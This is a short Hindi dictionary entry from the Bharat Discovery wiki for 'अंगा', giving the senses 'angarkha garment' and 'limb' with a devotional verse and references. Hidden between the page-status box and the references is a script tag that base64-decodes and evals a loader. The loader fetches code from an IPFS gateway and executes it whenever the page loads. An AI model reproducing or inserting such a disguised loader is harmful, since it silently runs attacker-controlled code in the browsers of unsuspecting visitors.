अंगा

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

अंगा - संज्ञा पुल्लिंग (संस्कृत अङ्ग)[1]

1. एक पहनावा जो घुटनों के नीचे तक लंबा होता है और जिसमें बंद लगे रहते हैं। अंगरखा, चपकन ।


अंगा - संज्ञा पुल्लिंग (संस्कृत अङ्ग)

'अंग'

उदाहरण

"देवी गंगा लहर तुरंगा तुहरे लहर परभू, भीजे आठो अंगा।"[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. हिंदी शब्दसागर, प्रथम भाग |लेखक: श्यामसुंदरदास बी. ए. |प्रकाशक: नागरी मुद्रण, वाराणसी |पृष्ठ संख्या: 08 |
  2. शुक्ल अभिनंदन ग्रंथ, पृ. 138

संबंधित लेख